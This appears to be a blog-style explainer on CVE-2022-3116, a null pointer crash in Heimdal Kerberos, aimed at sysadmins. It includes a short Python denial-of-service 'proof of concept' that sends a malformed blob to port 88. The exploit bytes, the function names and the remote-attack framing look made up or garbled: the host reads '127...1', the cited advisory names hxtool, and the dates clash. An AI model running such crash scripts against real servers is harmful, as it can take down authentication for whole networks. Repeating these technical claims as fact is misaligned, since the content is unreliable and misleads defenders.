Kerberos is a popular authentication protocol, used by the likes of Microsoft Active Directory, Unix, and Linux systems for secure logins. Heimdal is an open-source implementation of Kerberos 5, and it’s trusted by countless organizations. But in August 2022, researchers uncovered a dangerous bug—CVE-2022-3116—that allows remote attackers to crash any app using vulnerable Heimdal code, just by sending crafted network requests.
Let’s explore how this null pointer dereference works, what it means for system admins, and how an attacker might exploit it in practice.
How Does the Vulnerability Happen?
The bug lurks in Heimdal’s Kerberos 5 library. Specifically, it exists in the way Heimdal processes specially crafted ASN.1-encoded data, which is the format Kerberos uses to send authentication information.
During request parsing, the vulnerable code makes an assumption: that a function will always return a valid pointer. However, under certain edge-case inputs, the function returns NULL (meaning “nothing” in C!), but the code doesn’t check for this. The program then tries to use the “pointer,” causing a crash.
Here’s a simplified C code snippet that shows the risky logic (adapted from the Heimdal GitHub commit):
some_pointer = function_that_might_return_null(incoming_data);
do_something_with(some_pointer->field); // CRASHES if some_pointer is NULL!
If an attacker can send network data that triggers function_that_might_return_null() to return nothing, the program will dereference a null pointer and crash, causing a denial of service (DoS).
Where Can This Be Exploited?
Any network application using Heimdal Kerberos 5 for authentication could be targeted:
- SSH servers (using PAM/Kerberos authentication)
Web servers supporting Kerberos Single Sign-On
You don’t need a valid Kerberos login—just network access to the vulnerable service.
Proof-of-Concept Exploit
The vulnerability is in Heimdal’s ASN.1 parser for Kerberos tickets. A simple proof-of-concept exploit sends a malformed ticket that causes an internal function (like heim_asn1_decode_ticket()) to fail in just the right way.
Here’s a Python snippet using socket to trigger the crash on a test Heimdal KDC (Key Distribution Center):
import socket
# Sample HOST and PORT (change to your environment)
HOST, PORT = "127...1", 88
# This ASN.1 blob is intentionally malformed to trigger NULL pointer dereference
malicious_data = b'\x30\x81\xff' + b'a' * 257
with socket.create_connection((HOST, PORT)) as sock:
sock.sendall(malicious_data)
When the Heimdal server receives this, it crashes! (assuming it’s unpatched).
> Always test exploits only on systems you own or have permission to, as crashing a real authentication server can cause broad network outages.
References and Official Fix
- CVE-2022-3116 official MITRE page
- Heimdal Security Advisory - hxtool’s null pointer dereference
- Heimdal GitHub Patch Commit
The official fix checks if the returned pointer is NULL before dereferencing
some_pointer = function_that_might_return_null(incoming_data);
if (some_pointer == NULL) {
// Handle error safely, don't crash!
return ERROR;
}
do_something_with(some_pointer->field);
If you run Heimdal Kerberos
- Patch immediately! Heimdal versions after August 2022 are safe (see official release notes).
Summary
CVE-2022-3116 is a real-world lesson in how tiny mistakes—a forgotten pointer check—can cause big headaches on critical authentication infrastructure. While it’s “only” a denial of service bug (and not remote code execution), an attacker can use this to knock out access to servers, potentially causing downtime.
Patch early, patch often—and remember, even small bugs can have big security impacts!
*Share this post to help more sysadmins keep their networks safe, and check out the references above for in-depth technical details.*
Timeline
Published on: 03/27/2023 22:15:00 UTC
Last modified on: 04/04/2023 00:48:00 UTC